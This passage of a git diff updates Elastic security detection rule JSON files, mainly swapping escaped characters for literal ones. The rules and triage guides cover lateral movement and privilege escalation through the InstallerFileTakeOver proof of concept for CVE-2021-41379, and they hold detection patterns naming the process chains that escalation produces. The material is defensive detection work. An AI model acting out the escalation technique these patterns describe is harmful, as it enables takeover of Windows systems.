rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/58aa72ca-d968-4f34-b9f7-bea51d75eb50_108.json b/packages/security_detection_engine/kibana/security_rule/58aa72ca-d968-4f34-b9f7-bea51d75eb50_108.json index 054e66d9d86..44fbc892d14 100644 --- a/packages/security_detection_engine/kibana/security_rule/58aa72ca-d968-4f34-b9f7-bea51d75eb50_108.json +++ b/packages/security_detection_engine/kibana/security_rule/58aa72ca-d968-4f34-b9f7-bea51d75eb50_108.json @@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "58aa72ca-d968-4f34-b9f7-bea51d75eb50", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -91,7 +91,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/58aa72ca-d968-4f34-b9f7-bea51d75eb50_109.json b/packages/security_detection_engine/kibana/security_rule/58aa72ca-d968-4f34-b9f7-bea51d75eb50_109.json index e74ea29ad00..cfa1050598e 100644 --- a/packages/security_detection_engine/kibana/security_rule/58aa72ca-d968-4f34-b9f7-bea51d75eb50_109.json +++ b/packages/security_detection_engine/kibana/security_rule/58aa72ca-d968-4f34-b9f7-bea51d75eb50_109.json @@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "58aa72ca-d968-4f34-b9f7-bea51d75eb50", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -91,7 +91,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/58ac2aa5-6718-427c-a845-5f3ac5af00ba_100.json b/packages/security_detection_engine/kibana/security_rule/58ac2aa5-6718-427c-a845-5f3ac5af00ba_100.json index 781a6c2ffeb..e97569788f8 100644 --- a/packages/security_detection_engine/kibana/security_rule/58ac2aa5-6718-427c-a845-5f3ac5af00ba_100.json +++ b/packages/security_detection_engine/kibana/security_rule/58ac2aa5-6718-427c-a845-5f3ac5af00ba_100.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/58ac2aa5-6718-427c-a845-5f3ac5af00ba_101.json b/packages/security_detection_engine/kibana/security_rule/58ac2aa5-6718-427c-a845-5f3ac5af00ba_101.json index 84ffd037dfe..58f5db6045b 100644 --- a/packages/security_detection_engine/kibana/security_rule/58ac2aa5-6718-427c-a845-5f3ac5af00ba_101.json +++ b/packages/security_detection_engine/kibana/security_rule/58ac2aa5-6718-427c-a845-5f3ac5af00ba_101.json @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/58ac2aa5-6718-427c-a845-5f3ac5af00ba_102.json b/packages/security_detection_engine/kibana/security_rule/58ac2aa5-6718-427c-a845-5f3ac5af00ba_102.json index b55963e47b5..56c4e9cb6cf 100644 --- a/packages/security_detection_engine/kibana/security_rule/58ac2aa5-6718-427c-a845-5f3ac5af00ba_102.json +++ b/packages/security_detection_engine/kibana/security_rule/58ac2aa5-6718-427c-a845-5f3ac5af00ba_102.json @@ -53,7 +53,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/58bc134c-e8d2-4291-a552-b4b3e537c60b_104.json b/packages/security_detection_engine/kibana/security_rule/58bc134c-e8d2-4291-a552-b4b3e537c60b_104.json index 344f9b6b0a7..581b3fa2054 100644 --- a/packages/security_detection_engine/kibana/security_rule/58bc134c-e8d2-4291-a552-b4b3e537c60b_104.json +++ b/packages/security_detection_engine/kibana/security_rule/58bc134c-e8d2-4291-a552-b4b3e537c60b_104.json @@ -90,7 +90,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/58bc134c-e8d2-4291-a552-b4b3e537c60b_105.json b/packages/security_detection_engine/kibana/security_rule/58bc134c-e8d2-4291-a552-b4b3e537c60b_105.json index 1a276c22a70..d1074628c6e 100644 --- a/packages/security_detection_engine/kibana/security_rule/58bc134c-e8d2-4291-a552-b4b3e537c60b_105.json +++ b/packages/security_detection_engine/kibana/security_rule/58bc134c-e8d2-4291-a552-b4b3e537c60b_105.json @@ -89,7 +89,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/58bc134c-e8d2-4291-a552-b4b3e537c60b_106.json b/packages/security_detection_engine/kibana/security_rule/58bc134c-e8d2-4291-a552-b4b3e537c60b_106.json index 062ceaffb44..ba78c739da6 100644 --- a/packages/security_detection_engine/kibana/security_rule/58bc134c-e8d2-4291-a552-b4b3e537c60b_106.json +++ b/packages/security_detection_engine/kibana/security_rule/58bc134c-e8d2-4291-a552-b4b3e537c60b_106.json @@ -90,7 +90,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/58bc134c-e8d2-4291-a552-b4b3e537c60b_107.json b/packages/security_detection_engine/kibana/security_rule/58bc134c-e8d2-4291-a552-b4b3e537c60b_107.json index 8e5f92d0aed..dd19be632b5 100644 --- a/packages/security_detection_engine/kibana/security_rule/58bc134c-e8d2-4291-a552-b4b3e537c60b_107.json +++ b/packages/security_detection_engine/kibana/security_rule/58bc134c-e8d2-4291-a552-b4b3e537c60b_107.json @@ -89,7 +89,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/58c6d58b-a0d3-412d-b3b8-0981a9400607_104.json b/packages/security_detection_engine/kibana/security_rule/58c6d58b-a0d3-412d-b3b8-0981a9400607_104.json index 6caf8f14228..19514686bac 100644 --- a/packages/security_detection_engine/kibana/security_rule/58c6d58b-a0d3-412d-b3b8-0981a9400607_104.json +++ b/packages/security_detection_engine/kibana/security_rule/58c6d58b-a0d3-412d-b3b8-0981a9400607_104.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Privilege Escalation via InstallerFileTakeOver", - "note": "## Triage and analysis\n\n### Investigating Potential Privilege Escalation via InstallerFileTakeOver\n\nInstallerFileTakeOver is a weaponized escalation of privilege proof of concept (EoP PoC) to the CVE-2021-41379 vulnerability. Upon successful exploitation, an unprivileged user will escalate privileges to SYSTEM/NT AUTHORITY.\n\nThis rule detects the default execution of the PoC, which overwrites the `elevation_service.exe` DACL and copies itself to the location to escalate privileges. An attacker is able to still take over any file that is not in use (locked), which is outside the scope of this rule.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Look for additional processes spawned by the process, command lines, and network communications.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Verify whether a digital signature exists in the executable, and if it is valid.\n\n### Related rules\n\n- Suspicious DLL Loaded for Persistence or Privilege Escalation - bfeaf89b-a2a7-48a3-817f-e41829dc61ee\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Potential Privilege Escalation via InstallerFileTakeOver\n\nInstallerFileTakeOver is a weaponized escalation of privilege proof of concept (EoP PoC) to the CVE-2021-41379 vulnerability. Upon successful exploitation, an unprivileged user will escalate privileges to SYSTEM/NT AUTHORITY.\n\nThis rule detects the default execution of the PoC, which overwrites the `elevation_service.exe` DACL and copies itself to the location to escalate privileges. An attacker is able to still take over any file that is not in use (locked), which is outside the scope of this rule.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Look for additional processes spawned by the process, command lines, and network communications.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Verify whether a digital signature exists in the executable, and if it is valid.\n\n### Related rules\n\n- Suspicious DLL Loaded for Persistence or Privilege Escalation - bfeaf89b-a2a7-48a3-817f-e41829dc61ee\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "/* This rule is compatible with both Sysmon and Elastic Endpoint */\n\nprocess where host.os.type == \"windows\" and event.type == \"start\" and\n (?process.Ext.token.integrity_level_name : \"System\" or\n ?winlog.event_data.IntegrityLevel : \"System\") and\n (\n (process.name : \"elevation_service.exe\" and\n not process.pe.original_file_name == \"elevation_service.exe\") or\n\n (process.parent.name : \"elevation_service.exe\" and\n process.name : (\"rundll32.exe\", \"cmd.exe\", \"powershell.exe\"))\n )\n", "references": [ "https://github.com/klinix5/InstallerFileTakeOver" @@ -67,7 +67,7 @@ ], "risk_score": 73, "rule_id": "58c6d58b-a0d3-412d-b3b8-0981a9400607", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/58c6d58b-a0d3-412d-b3b8-0981a9400607_105.json b/packages/security_detection_engine/kibana/security_rule/58c6d58b-a0d3-412d-b3b8-0981a9400607_105.json index 70a7f815853..d5e263de636 100644 --- a/packages/security_detection_engine/kibana/security_rule/58c6d58b-a0d3-412d-b3b8-0981a9400607_105.json +++ b/packages/security_detection_engine/kibana/security_rule/58c6d58b-a0d3-412d-b3b8-0981a9400607_105.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Privilege Escalation via InstallerFileTakeOver", - "note": "## Triage and analysis\n\n### Investigating Potential Privilege Escalation via InstallerFileTakeOver\n\nInstallerFileTakeOver is a weaponized escalation of privilege proof of concept (EoP PoC) to the CVE-2021-41379 vulnerability. Upon successful exploitation, an unprivileged user will escalate privileges to SYSTEM/NT AUTHORITY.\n\nThis rule detects the default execution of the PoC, which overwrites the `elevation_service.exe` DACL and copies itself to the location to escalate privileges. An attacker is able to still take over any file that is not in use (locked), which is outside the scope of this rule.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Look for additional processes spawned by the process, command lines, and network communications.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Verify whether a digital signature exists in the executable, and if it is valid.\n\n### Related rules\n\n- Suspicious DLL Loaded for Persistence or Privilege Escalation - bfeaf89b-a2a7-48a3-817f-e41829dc61ee\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Potential Privilege Escalation via InstallerFileTakeOver\n\nInstallerFileTakeOver is a weaponized escalation of privilege proof of concept (EoP PoC) to the CVE-2021-41379 vulnerability. Upon successful exploitation, an unprivileged user will escalate privileges to SYSTEM/NT AUTHORITY.\n\nThis rule detects the default execution of the PoC, which overwrites the `elevation_service.exe` DACL and copies itself to the location to escalate privileges. An attacker is able to still take over any file that is not in use (locked), which is outside the scope of this rule.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Look for additional processes spawned by the process, command lines, and network communications.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Verify whether a digital signature exists in the executable, and if it is valid.\n\n### Related rules\n\n- Suspicious DLL Loaded for Persistence or Privilege Escalation - bfeaf89b-a2a7-48a3-817f-e41829dc61ee\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "/* This rule is compatible with both Sysmon and Elastic Endpoint */\n\nprocess where host.os.type == \"windows\" and event.type == \"start\" and\n (?process.Ext.token.integrity_level_name : \"System\" or\n ?winlog.event_data.IntegrityLevel : \"System\") and\n (\n (process.name : \"elevation_service.exe\" and\n not process.pe.original_file_name == \"elevation_service.exe\") or\n\n (process.parent.name : \"elevation_service.exe\" and\n process.name : (\"rundll32.exe\", \"cmd.exe\", \"powershell.exe\"))\n )\n", "references": [ "https://github.com/klinix5/InstallerFileTakeOver" @@ -67,7 +67,7 @@ ], "risk_score": 73, "rule_id": "58c6d58b-a0d3-412d-b3b8-0981a9400607", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/58c6d58b-a0d3-412d-b3b8-0981a9400607_106.json b/packages/security_detection_engine/kibana/security_rule/58c6d58b-a0d3-412d-b3b8-0981a9400607_106.json index 9ad723fe833..c2169bc8782 100644 --- a/packages/security_detection_engine/kibana/security_rule/58c6d58b-a0d3-412d-b3b8-0981a9400607_106.json +++ b/packages/security_detection_engine/kibana/security_rule/58c6d58b-a0d3-412d-b3b8-0981a9400607_106.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Privilege Escalation via InstallerFileTakeOver", - "note": "## Triage and analysis\n\n### Investigating Potential Privilege Escalation via InstallerFileTakeOver\n\nInstallerFileTakeOver is a weaponized escalation of privilege proof of concept (EoP PoC) to the CVE-2021-41379 vulnerability. Upon successful exploitation, an unprivileged user will escalate privileges to SYSTEM/NT AUTHORITY.\n\nThis rule detects the default execution of the PoC, which overwrites the `elevation_service.exe` DACL and copies itself to the location to escalate privileges. An attacker is able to still take over any file that is not in use (locked), which is outside the scope of this rule.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Look for additional processes spawned by the process, command lines, and network communications.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Verify whether a digital signature exists in the executable, and if it is valid.\n\n### Related rules\n\n- Suspicious DLL Loaded for Persistence or Privilege Escalation - bfeaf89b-a2a7-48a3-817f-e41829dc61ee\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are 